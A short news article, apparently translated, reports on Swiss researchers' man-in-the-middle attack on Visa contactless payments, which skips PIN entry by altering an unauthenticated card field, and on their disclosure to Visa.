Researchers can bypass Visa payments with man-in-the-middle PINs
Swiss security researchers have found a way to bypass the Visa card PIN. To do this, they used a homemade app and had to make a payment via a telephone.
The research was carried out by scientists from the Swiss Federal Institute of Technology. They discovered a method to carry out a man-in-the-middle attack on Visa card payments made with a phone. The researchers used a self-built app that emulates a map on a smartphone. It is also necessary to have a second telephone that emulates a payment terminal.
The researchers use the payment terminal calculator to scan a Visa card. On the first phone, the researchers can authenticate the card without entering the PIN. The signal is then sent to the second telephone, which can be used to pay in a shop. For example, they can make large payments in, for example, a shop without having to enter the code.
The vulnerability is in the EMV protocol supported by various payment providers, along with Visa’s proprietary contactless payment protocol. Specifically, the vulnerability lies in the way a card is authenticated during a transaction. According to the researchers, the method by which a card is verified during a transaction can be adjusted. No further authentication is requested for the adjustment and it is not verified with cryptography. Verification is normally done with a Card Transaction Qualifier. The researchers were able to adjust this. This allowed them to trick a payment terminal into thinking that a pin code was not needed. The scientists found the vulnerability by analyzing it with Tamarin and then building an app themselves.
The researchers say the app they built works on any Android phone. They don’t need any special root permissions for that. The researchers not only showed a proof-of-concept, but also conducted a test in various real stores. After the discovery, the researchers would have approached Visa with possible solutions. It is not necessary to adjust the EMV protocol or to issue new cards, but Visa does need to secure existing terminals via a software update. The investigation does not state whether the company has already done so.